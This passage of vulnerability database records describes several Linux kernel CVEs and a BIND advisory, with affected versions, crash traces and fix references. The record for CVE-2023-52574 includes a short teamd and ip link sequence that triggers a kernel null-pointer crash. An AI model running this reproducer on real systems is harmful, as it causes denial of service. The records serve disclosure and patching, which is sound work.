3138-1] bind9 security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00007.html" }, { "name": "GLSA-202210-25", "tags": [ "vendor-advisory" ], "url": "https://security.gentoo.org/glsa/202210-25" } ], "solutions": [ { "lang": "en", "value": "Upgrade to the patched release most closely related to your current version of BIND: BIND 9.16.33, BIND 9.18.7, BIND 9.19.5, or for BIND Supported Preview Edition (a special feature preview branch of BIND provided to eligible ISC support customers): BIND 9.16.33-S1." } ], "source": { "discovery": "EXTERNAL" }, "title": "Processing large delegations may severely degrade resolver performance", "workarounds": [ { "lang": "en", "value": "No workarounds known." } ] } }, "cveMetadata": { "assignerOrgId": "404fd4d2-a609-4245-b543-2c944a302a22", "assignerShortName": "isc", "cveId": "CVE-2022-2795", "datePublished": "2022-09-21T10:15:25.796304Z", "dateReserved": "2022-08-12T00:00:00", "dateUpdated": "2024-11-29T12:04:33.614Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-52574
Vulnerability from cvelistv5
Published
2024-03-02 21:59
Modified
2024-12-19 08:21
Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
team: fix null-ptr-deref when team device type is changed
Get a null-ptr-deref bug as follows with reproducer [1].
BUG: kernel NULL pointer dereference, address: 0000000000000228
...
RIP: 0010:vlan_dev_hard_header+0x35/0x140 [8021q]
...
Call Trace:
<TASK>
? __die+0x24/0x70
? page_fault_oops+0x82/0x150
? exc_page_fault+0x69/0x150
? asm_exc_page_fault+0x26/0x30
? vlan_dev_hard_header+0x35/0x140 [8021q]
? vlan_dev_hard_header+0x8e/0x140 [8021q]
neigh_connected_output+0xb2/0x100
ip6_finish_output2+0x1cb/0x520
? nf_hook_slow+0x43/0xc0
? ip6_mtu+0x46/0x80
ip6_finish_output+0x2a/0xb0
mld_sendpack+0x18f/0x250
mld_ifc_work+0x39/0x160
process_one_work+0x1e6/0x3f0
worker_thread+0x4d/0x2f0
? __pfx_worker_thread+0x10/0x10
kthread+0xe5/0x120
? __pfx_kthread+0x10/0x10
ret_from_fork+0x34/0x50
? __pfx_kthread+0x10/0x10
ret_from_fork_asm+0x1b/0x30
[1]
$ teamd -t team0 -d -c '{"runner": {"name": "loadbalance"}}'
$ ip link add name t-dummy type dummy
$ ip link add link t-dummy name t-dummy.100 type vlan id 100
$ ip link add name t-nlmon type nlmon
$ ip link set t-nlmon master team0
$ ip link set t-nlmon nomaster
$ ip link set t-dummy up
$ ip link set team0 up
$ ip link set t-dummy.100 down
$ ip link set t-dummy.100 master team0
When enslave a vlan device to team device and team device type is changed
from non-ether to ether, header_ops of team device is changed to
vlan_header_ops. That is incorrect and will trigger null-ptr-deref
for vlan->real_dev in vlan_dev_hard_header() because team device is not
a vlan device.
Cache eth_header_ops in team_setup(), then assign cached header_ops to
header_ops of team net device when its type is changed from non-ether
to ether to fix the bug.
References
Impacted products
Vendor | Product | Version | |||||
---|---|---|---|---|---|---|---|
▼ | Linux | Linux |
Version: 1d76efe1577b4323609b1bcbfafa8b731eda071a Version: 1d76efe1577b4323609b1bcbfafa8b731eda071a Version: 1d76efe1577b4323609b1bcbfafa8b731eda071a Version: 1d76efe1577b4323609b1bcbfafa8b731eda071a Version: 1d76efe1577b4323609b1bcbfafa8b731eda071a Version: 1d76efe1577b4323609b1bcbfafa8b731eda071a Version: 1d76efe1577b4323609b1bcbfafa8b731eda071a Version: 1d76efe1577b4323609b1bcbfafa8b731eda071a |
||||
|
{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2023-52574", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-03-06T20:45:03.463636Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-06-04T17:22:44.896Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-02T23:03:20.914Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/1779eb51b9cc628cee551f252701a85a2a50a457" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/a7fb47b9711101d2405b0eb1276fb1f9b9b270c7" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/c5f6478686bb45f453031594ae19b6c9723a780d" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/b44dd92e2afd89eb6e9d27616858e72a67bdc1a7" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/cd05eec2ee0cc396813a32ef675634e403748255" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/2f0acb0736ecc3eb85dc80ad2790d634dcb10b58" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/cac50d9f5d876be32cb9aa21c74018468900284d" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/492032760127251e5540a5716a70996bacf2a3fd" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "Linux", "programFiles": [ "drivers/net/team/team.c", "include/linux/if_team.h" ], "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git", "vendor": "Linux", "versions": [ { "lessThan": "1779eb51b9cc628cee551f252701a85a2a50a457", "status": "affected", "version": "1d76efe1577b4323609b1bcbfafa8b731eda071a", "versionType": "git" }, { "lessThan": "a7fb47b9711101d2405b0eb1276fb1f9b9b270c7", "status": "affected", "version": "1d76efe1577b4323609b1bcbfafa8b731eda071a", "versionType": "git" }, { "lessThan": "c5f6478686bb45f453031594ae19b6c9723a780d", "status": "affected", "version": "1d76efe1577b4323609b1bcbfafa8b731eda071a", "versionType": "git" }, { "lessThan": "b44dd92e2afd89eb6e9d27616858e72a67bdc1a7", "status": "affected", "version": "1d76efe1577b4323609b1bcbfafa8b731eda071a", "versionType": "git" }, { "lessThan": "cd05eec2ee0cc396813a32ef675634e403748255", "status": "affected", "version": "1d76efe1577b4323609b1bcbfafa8b731eda071a", "versionType": "git" }, { "lessThan": "2f0acb0736ecc3eb85dc80ad2790d634dcb10b58", "status": "affected", "version": "1d76efe1577b4323609b1bcbfafa8b731eda071a", "versionType": "git" }, { "lessThan": "cac50d9f5d876be32cb9aa21c74018468900284d", "status": "affected", "version": "1d76efe1577b4323609b1bcbfafa8b731eda071a", "versionType": "git" }, { "lessThan": "492032760127251e5540a5716a70996bacf2a3fd", "status": "affected", "version": "1d76efe1577b4323609b1bcbfafa8b731eda071a", "versionType": "git" } ] }, { "defaultStatus": "affected", "product": "Linux", "programFiles": [ "drivers/net/team/team.c", "include/linux/if_team.h" ], "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git", "vendor": "Linux", "versions": [ { "status": "affected", "version": "3.7" }, { "lessThan": "3.7", "status": "unaffected", "version": "0", "versionType": "semver" }, { "lessThanOrEqual": "4.14.*", "status": "unaffected", "version": "4.14.327", "versionType": "semver" }, { "lessThanOrEqual": "4.19.*", "status": "unaffected", "version": "4.19.296", "versionType": "semver" }, { "lessThanOrEqual": "5.4.*", "status": "unaffected", "version": "5.4.258", "versionType": "semver" }, { "lessThanOrEqual": "5.10.*", "status": "unaffected", "version": "5.10.198", "versionType": "semver" }, { "lessThanOrEqual": "5.15.*", "status": "unaffected", "version": "5.15.134", "versionType": "semver" }, { "lessThanOrEqual": "6.1.*", "status": "unaffected", "version": "6.1.56", "versionType": "semver" }, { "lessThanOrEqual": "6.5.*", "status": "unaffected", "version": "6.5.6", "versionType": "semver" }, { "lessThanOrEqual": "*", "status": "unaffected", "version": "6.6", "versionType": "original_commit_for_fix" } ] } ], "descriptions": [ { "lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nteam: fix null-ptr-deref when team device type is changed\n\nGet a null-ptr-deref bug as follows with reproducer [1].\n\nBUG: kernel NULL pointer dereference, address: 0000000000000228\n...\nRIP: 0010:vlan_dev_hard_header+0x35/0x140 [8021q]\n...\nCall Trace:\n \u003cTASK\u003e\n ? __die+0x24/0x70\n ? page_fault_oops+0x82/0x150\n ? exc_page_fault+0x69/0x150\n ? asm_exc_page_fault+0x26/0x30\n ? vlan_dev_hard_header+0x35/0x140 [8021q]\n ? vlan_dev_hard_header+0x8e/0x140 [8021q]\n neigh_connected_output+0xb2/0x100\n ip6_finish_output2+0x1cb/0x520\n ? nf_hook_slow+0x43/0xc0\n ? ip6_mtu+0x46/0x80\n ip6_finish_output+0x2a/0xb0\n mld_sendpack+0x18f/0x250\n mld_ifc_work+0x39/0x160\n process_one_work+0x1e6/0x3f0\n worker_thread+0x4d/0x2f0\n ? __pfx_worker_thread+0x10/0x10\n kthread+0xe5/0x120\n ? __pfx_kthread+0x10/0x10\n ret_from_fork+0x34/0x50\n ? __pfx_kthread+0x10/0x10\n ret_from_fork_asm+0x1b/0x30\n\n[1]\n$ teamd -t team0 -d -c \u0027{\"runner\": {\"name\": \"loadbalance\"}}\u0027\n$ ip link add name t-dummy type dummy\n$ ip link add link t-dummy name t-dummy.100 type vlan id 100\n$ ip link add name t-nlmon type nlmon\n$ ip link set t-nlmon master team0\n$ ip link set t-nlmon nomaster\n$ ip link set t-dummy up\n$ ip link set team0 up\n$ ip link set t-dummy.100 down\n$ ip link set t-dummy.100 master team0\n\nWhen enslave a vlan device to team device and team device type is changed\nfrom non-ether to ether, header_ops of team device is changed to\nvlan_header_ops. That is incorrect and will trigger null-ptr-deref\nfor vlan-\u003ereal_dev in vlan_dev_hard_header() because team device is not\na vlan device.\n\nCache eth_header_ops in team_setup(), then assign cached header_ops to\nheader_ops of team net device when its type is changed from non-ether\nto ether to fix the bug." } ], "providerMetadata": { "dateUpdated": "2024-12-19T08:21:55.517Z", "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "shortName": "Linux" }, "references": [ { "url": "https://git.kernel.org/stable/c/1779eb51b9cc628cee551f252701a85a2a50a457" }, { "url": "https://git.kernel.org/stable/c/a7fb47b9711101d2405b0eb1276fb1f9b9b270c7" }, { "url": "https://git.kernel.org/stable/c/c5f6478686bb45f453031594ae19b6c9723a780d" }, { "url": "https://git.kernel.org/stable/c/b44dd92e2afd89eb6e9d27616858e72a67bdc1a7" }, { "url": "https://git.kernel.org/stable/c/cd05eec2ee0cc396813a32ef675634e403748255" }, { "url": "https://git.kernel.org/stable/c/2f0acb0736ecc3eb85dc80ad2790d634dcb10b58" }, { "url": "https://git.kernel.org/stable/c/cac50d9f5d876be32cb9aa21c74018468900284d" }, { "url": "https://git.kernel.org/stable/c/492032760127251e5540a5716a70996bacf2a3fd" } ], "title": "team: fix null-ptr-deref when team device type is changed", "x_generator": { "engine": "bippy-5f407fcff5a0" } } }, "cveMetadata": { "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "assignerShortName": "Linux", "cveId": "CVE-2023-52574", "datePublished": "2024-03-02T21:59:43.271Z", "dateReserved": "2024-03-02T21:55:42.568Z", "dateUpdated": "2024-12-19T08:21:55.517Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2024-26586
Vulnerability from cvelistv5
Published
2024-02-22 16:13
Modified
2024-12-19 08:43
Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
mlxsw: spectrum_acl_tcam: Fix stack corruption
When tc filters are first added to a net device, the corresponding local
port gets bound to an ACL group in the device. The group contains a list
of ACLs. In turn, each ACL points to a different TCAM region where the
filters are stored. During forwarding, the ACLs are sequentially
evaluated until a match is found.
One reason to place filters in different regions is when they are added
with decreasing priorities and in an alternating order so that two
consecutive filters can never fit in the same region because of their
key usage.
In Spectrum-2 and newer ASICs the firmware started to report that the
maximum number of ACLs in a group is more than 16, but the layout of the
register that configures ACL groups (PAGT) was not updated to account
for that. It is therefore possible to hit stack corruption [1] in the
rare case where more than 16 ACLs in a group are required.
Fix by limiting the maximum ACL group size to the minimum between what
the firmware reports and the maximum ACLs that fit in the PAGT register.
Add a test case to make sure the machine does not crash when this
condition is hit.
[1]
Kernel panic - not syncing: stack-protector: Kernel stack is corrupted in: mlxsw_sp_acl_tcam_group_update+0x116/0x120
[...]
dump_stack_lvl+0x36/0x50
panic+0x305/0x330
__stack_chk_fail+0x15/0x20
mlxsw_sp_acl_tcam_group_update+0x116/0x120
mlxsw_sp_acl_tcam_group_region_attach+0x69/0x110
mlxsw_sp_acl_tcam_vchunk_get+0x492/0xa20
mlxsw_sp_acl_tcam_ventry_add+0x25/0xe0
mlxsw_sp_acl_rule_add+0x47/0x240
mlxsw_sp_flower_replace+0x1a9/0x1d0
tc_setup_cb_add+0xdc/0x1c0
fl_hw_replace_filter+0x146/0x1f0
fl_change+0xc17/0x1360
tc_new_tfilter+0x472/0xb90
rtnetlink_rcv_msg+0x313/0x3b0
netlink_rcv_skb+0x58/0x100
netlink_unicast+0x244/0x390
netlink_sendmsg+0x1e4/0x440
____sys_sendmsg+0x164/0x260
___sys_sendmsg+0x9a/0xe0
__sys_sendmsg+0x7a/0xc0
do_syscall_64+0x40/0xe0
entry_SYSCALL_64_after_hwframe+0x63/0x6b
References
Impacted products
Vendor | Product | Version | |||||
---|---|---|---|---|---|---|---|
▼ | Linux | Linux |
Version: c3ab435466d5109b2c7525a3b90107d4d9e918fc Version: c3ab435466d5109b2c7525a3b90107d4d9e918fc Version: c3ab435466d5109b2c7525a3b90107d4d9e918fc Version: c3ab435466d5109b2c7525a3b90107d4d9e918fc Version: c3ab435466d5109b2c7525a3b90107d4d9e918fc Version: c3ab435466d5109b2c7525a3b90107d4d9e918fc |
||||
|
{ "containers": { "adp": [ { "metrics": [ { "other": { "content": { "id": "CVE-2024-26586", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-02-22T20:41:19.395721Z", "version": "2.0.3" }, "type": "ssvc" } } ], "providerMetadata": { "dateUpdated": "2024-07-05T17:21:02.147Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-02T00:07:19.636Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/56750ea5d15426b5f307554e7699e8b5f76c3182" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/348112522a35527c5bcba933b9fefb40a4f44f15" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/6fd24675188d354b1cad47462969afa2ab09d819" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/2f5e1565740490706332c06f36211d4ce0f88e62" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/a361c2c1da5dbb13ca67601cf961ab3ad68af383" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/483ae90d8f976f8339cf81066312e1329f2d3706" }, { "tags": [ "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "Linux", "programFiles": [ "drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c", "tools/testing/selftests/drivers/net/mlxsw/spectrum-2/tc_flower.sh" ], "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git", "vendor": "Linux", "versions": [ { "lessThan": "56750ea5d15426b5f307554e7699e8b5f76c3182", "status": "affected", "version": "c3ab435466d5109b2c7525a3b90107d4d9e918fc", "versionType": "git" }, { "lessThan": "348112522a35527c5bcba933b9fefb40a4f44f15", "status": "affected", "version": "c3ab435466d5109b2c7525a3b90107d4d9e918fc", "versionType": "git" }, { "lessThan": "6fd24675188d354b1cad47462969afa2ab09d819", "status": "affected", "version": "c3ab435466d5109b2c7525a3b90107d4d9e918fc", "versionType": "git" }, { "lessThan": "2f5e1565740490706332c06f36211d4ce0f88e62", "status": "affected", "version": "c3ab435466d5109b2c7525a3b90107d4d9e918fc", "versionType": "git" }, { "lessThan": "a361c2c1da5dbb13ca67601cf961ab3ad68af383", "status": "affected", "version": "c3ab435466d5109b2c7525a3b90107d4d9e918fc", "versionType": "git" }, { "lessThan": "483ae90d8f976f8339cf81066312e1329f2d3706", "status": "affected", "version": "c3ab435466d5109b2c7525a3b90107d4d9e918fc", "versionType": "git" } ] }, { "defaultStatus": "affected", "product": "Linux", "programFiles": [ "drivers/net/ethernet/mellanox/mlxsw/spectrum_acl_tcam.c", "tools/testing/selftests/drivers/net/mlxsw/spectrum-2/tc_flower.sh" ], "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git", "vendor": "Linux", "versions": [ { "status": "affected", "version": "4.19" }, { "lessThan": "4.19", "status": "unaffected", "version": "0", "versionType": "semver" }, { "lessThanOrEqual": "5.10.*", "status": "unaffected", "version": "5.10.209", "versionType": "semver" }, { "lessThanOrEqual": "5.15.*", "status": "unaffected", "version": "5.15.148", "versionType": "semver" }, { "lessThanOrEqual": "6.1.*", "status": "unaffected", "version": "6.1.79", "versionType": "semver" }, { "lessThanOrEqual": "6.6.*", "status": "unaffected", "version": "6.6.14", "versionType": "semver" }, { "lessThanOrEqual": "6.7.*", "status": "unaffected", "version": "6.7.2", "versionType": "semver" }, { "lessThanOrEqual": "*", "status": "unaffected", "version": "6.8", "versionType": "original_commit_for_fix" } ] } ], "descriptions": [ { "lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmlxsw: spectrum_acl_tcam: Fix stack corruption\n\nWhen tc filters are first added to a net device, the corresponding local\nport gets bound to an ACL group in the device. The group contains a list\nof ACLs. In turn, each ACL points to a different TCAM region where the\nfilters are stored. During forwarding, the ACLs are sequentially\nevaluated until a match is found.\n\nOne reason to place filters in different regions is when they are added\nwith decreasing priorities and in an alternating order so that two\nconsecutive filters can never fit in the same region because of their\nkey usage.\n\nIn Spectrum-2 and newer ASICs the firmware started to report that the\nmaximum number of ACLs in a group is more than 16, but the layout of the\nregister that configures ACL groups (PAGT) was not updated to account\nfor that. It is therefore possible to hit stack corruption [1] in the\nrare case where more than 16 ACLs in a group are required.\n\nFix by limiting the maximum ACL group size to the minimum between what\nthe firmware reports and the maximum ACLs that fit in the PAGT register.\n\nAdd a test case to make sure the machine does not crash when this\ncondition is hit.\n\n[1]\nKernel panic - not syncing: stack-protector: Kernel stack is corrupted in: mlxsw_sp_acl_tcam_group_update+0x116/0x120\n[...]\n dump_stack_lvl+0x36/0x50\n panic+0x305/0x330\n __stack_chk_fail+0x15/0x20\n mlxsw_sp_acl_tcam_group_update+0x116/0x120\n mlxsw_sp_acl_tcam_group_region_attach+0x69/0x110\n mlxsw_sp_acl_tcam_vchunk_get+0x492/0xa20\n mlxsw_sp_acl_tcam_ventry_add+0x25/0xe0\n mlxsw_sp_acl_rule_add+0x47/0x240\n mlxsw_sp_flower_replace+0x1a9/0x1d0\n tc_setup_cb_add+0xdc/0x1c0\n fl_hw_replace_filter+0x146/0x1f0\n fl_change+0xc17/0x1360\n tc_new_tfilter+0x472/0xb90\n rtnetlink_rcv_msg+0x313/0x3b0\n netlink_rcv_skb+0x58/0x100\n netlink_unicast+0x244/0x390\n netlink_sendmsg+0x1e4/0x440\n ____sys_sendmsg+0x164/0x260\n ___sys_sendmsg+0x9a/0xe0\n __sys_sendmsg+0x7a/0xc0\n do_syscall_64+0x40/0xe0\n entry_SYSCALL_64_after_hwframe+0x63/0x6b" } ], "providerMetadata": { "dateUpdated": "2024-12-19T08:43:01.214Z", "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "shortName": "Linux" }, "references": [ { "url": "https://git.kernel.org/stable/c/56750ea5d15426b5f307554e7699e8b5f76c3182" }, { "url": "https://git.kernel.org/stable/c/348112522a35527c5bcba933b9fefb40a4f44f15" }, { "url": "https://git.kernel.org/stable/c/6fd24675188d354b1cad47462969afa2ab09d819" }, { "url": "https://git.kernel.org/stable/c/2f5e1565740490706332c06f36211d4ce0f88e62" }, { "url": "https://git.kernel.org/stable/c/a361c2c1da5dbb13ca67601cf961ab3ad68af383" }, { "url": "https://git.kernel.org/stable/c/483ae90d8f976f8339cf81066312e1329f2d3706" } ], "title": "mlxsw: spectrum_acl_tcam: Fix stack corruption", "x_generator": { "engine": "bippy-5f407fcff5a0" } } }, "cveMetadata": { "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "assignerShortName": "Linux", "cveId": "CVE-2024-26586", "datePublished": "2024-02-22T16:13:31.796Z", "dateReserved": "2024-02-19T14:20:24.125Z", "dateUpdated": "2024-12-19T08:43:01.214Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-52522
Vulnerability from cvelistv5
Published
2024-03-02 21:52
Modified
2024-12-19 08:21
Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: fix possible store tearing in neigh_periodic_work()
While looking at a related syzbot report involving neigh_periodic_work(),
I found that I forgot to add an annotation when deleting an
RCU protected item from a list.
Readers use rcu_deference(*np), we need to use either
rcu_assign_pointer() or WRITE_ONCE() on writer side
to prevent store tearing.
I use rcu_assign_pointer() to have lockdep support,
this was the choice made in neigh_flush_dev().
References
Impacted products
Vendor | Product | Version | |||||
---|---|---|---|---|---|---|---|
▼ | Linux | Linux |
Version: 767e97e1e0db0d0f3152cd2f3bd3403596aedbad Version: 767e97e1e0db0d0f3152cd2f3bd3403596aedbad Version: 767e97e1e0db0d0f3152cd2f3bd3403596aedbad Version: 767e97e1e0db0d0f3152cd2f3bd3403596aedbad Version: 767e97e1e0db0d0f3152cd2f3bd3403596aedbad Version: 767e97e1e0db0d0f3152cd2f3bd3403596aedbad |
||||
|
{ "containers": { "adp": [ { "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" } }, { "other": { "content": { "id": "CVE-2023-52522", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "partial" } ], "role": "CISA Coordinator", "timestamp": "2024-03-05T20:28:00.493037Z", "version": "2.0.3" }, "type": "ssvc" } } ], "problemTypes": [ { "descriptions": [ { "description": "CWE-noinfo Not enough information", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-11-06T19:54:03.263Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" }, { "providerMetadata": { "dateUpdated": "2024-08-02T23:03:20.631Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/95eabb075a5902f4c0834ab1fb12dc35730c05af" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/2ea52a2fb8e87067e26bbab4efb8872639240eb0" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/147d89ee41434b97043c2dcb17a97dc151859baa" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/f82aac8162871e87027692b36af335a2375d4580" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/a75152d233370362eebedb2643592e7c883cc9fc" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/stable/c/25563b581ba3a1f263a00e8c9a97f5e7363be6fd" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "Linux", "programFiles": [ "net/core/neighbour.c" ], "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git", "vendor": "Linux", "versions": [ { "lessThan": "95eabb075a5902f4c0834ab1fb12dc35730c05af", "status": "affected", "version": "767e97e1e0db0d0f3152cd2f3bd3403596aedbad", "versionType": "git" }, { "lessThan": "2ea52a2fb8e87067e26bbab4efb8872639240eb0", "status": "affected", "version": "767e97e1e0db0d0f3152cd2f3bd3403596aedbad", "versionType": "git" }, { "lessThan": "147d89ee41434b97043c2dcb17a97dc151859baa", "status": "affected", "version": "767e97e1e0db0d0f3152cd2f3bd3403596aedbad", "versionType": "git" }, { "lessThan": "f82aac8162871e87027692b36af335a2375d4580", "status": "affected", "version": "767e97e1e0db0d0f3152cd2f3bd3403596aedbad", "versionType": "git" }, { "lessThan": "a75152d233370362eebedb2643592e7c883cc9fc", "status": "affected", "version": "767e97e1e0db0d0f3152cd2f3bd3403596aedbad", "versionType": "git" }, { "lessThan": "25563b581ba3a1f263a00e8c9a97f5e7363be6fd", "status": "affected", "version": "767e97e1e0db0d0f3152cd2f3bd3403596aedbad", "versionType": "git" } ] }, { "defaultStatus": "affected", "product": "Linux", "programFiles": [ "net/core/neighbour.c" ], "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git", "vendor": "Linux", "versions": [ { "status": "affected", "version": "2.6.37" }, { "lessThan": "2.6.37", "status": "unaffected", "version": "0", "versionType": "semver" }, { "lessThanOrEqual": "5.4.*", "status": "unaffected", "version": "5.4.258", "versionType": "semver" }, { "lessThanOrEqual": "5.10.*", "status": "unaffected", "version": "5.10.198", "versionType": "semver" }, { "lessThanOrEqual": "5.15.*", "status": "unaffected", "version": "5.15.135", "versionType": "semver" }, { "lessThanOrEqual": "6.1.*", "status": "unaffected", "version": "6.1.57", "versionType": "semver" }, { "lessThanOrEqual": "6.5.*", "status": "unaffected", "version": "6.5.7", "versionType": "semver" }, { "lessThanOrEqual": "*", "status": "unaffected", "version": "6.6", "versionType": "original_commit_for_fix" } ] } ], "descriptions": [ { "lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: fix possible store tearing in neigh_periodic_work()\n\nWhile looking at a related syzbot report involving neigh_periodic_work(),\nI found that I forgot to add an annotation when deleting an\nRCU protected item from a list.\n\nReaders use rcu_deference(*np), we need to use either\nrcu_assign_pointer() or WRITE_ONCE() on writer side\nto prevent store tearing.\n\nI use rcu_assign_pointer() to have lockdep support,\nthis was the choice made in neigh_flush_dev()." } ], "providerMetadata": { "dateUpdated": "2024-12-19T08:21:24.532Z", "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "shortName": "Linux" }, "references": [ { "url": "https://git.kernel.org/stable/c/95eabb075a5902f4c0834ab1fb12dc35730c05af" }, { "url": "https://git.kernel.org/stable/c/2ea52a2fb8e87067e26bbab4efb8872639240eb0" }, { "url": "https://git.kernel.org/stable/c/147d89ee41434b97043c2dcb17a97dc151859baa" }, { "url": "https://git.kernel.org/stable/c/f82aac8162871e87027692b36af335a2375d4580" }, { "url": "https://git.kernel.org/stable/c/a75152d233370362eebedb2643592e7c883cc9fc" }, { "url": "https://git.kernel.org/stable/c/25563b581ba3a1f263a00e8c9a97f5e7363be6fd" } ], "title": "net: fix possible store tearing in neigh_periodic_work()", "x_generator": { "engine": "bippy-5f407fcff5a0" } } }, "cveMetadata": { "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "assignerShortName": "Linux", "cveId": "CVE-2023-52522", "datePublished": "2024-03-02T21:52:29.710Z", "dateReserved": "2024-02-20T12:30:33.317Z", "dateUpdated": "2024-12-19T08:21:24.532Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2023-51043
Vulnerability from cvelistv5
Published
2024-01-23 00:00
Modified
2024-08-29 14:28
Severity ?
EPSS score ?
Summary
In the Linux kernel before 6.4.5, drivers/gpu/drm/drm_atomic.c has a use-after-free during a race condition between a nonblocking atomic commit and a driver unload.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-02T22:23:44.220Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://github.com/torvalds/linux/commit/4e076c73e4f6e90816b30fcd4a0d7ab365087255" }, { "tags": [ "x_transferred" ], "url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.4.5" } ], "title": "CVE Program Container" }, { "metrics": [ { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" } }, { "other": { "content": { "id": "CVE-2023-51043", "options": [ { "Exploitation": "none" }, { "Automatable": "no" }, { "Technical Impact": "total" } ], "role": "CISA Coordinator", "timestamp": "2024-08-29T13:47:31.310537Z", "version": "2.0.3" }, "type": "ssvc" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416 Use After Free", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2024-08-29T14:28:09.022Z", "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "shortName": "CISA-ADP" }, "title": "CISA ADP Vulnrichment" } ], "cna": { "affected": [ { "product": 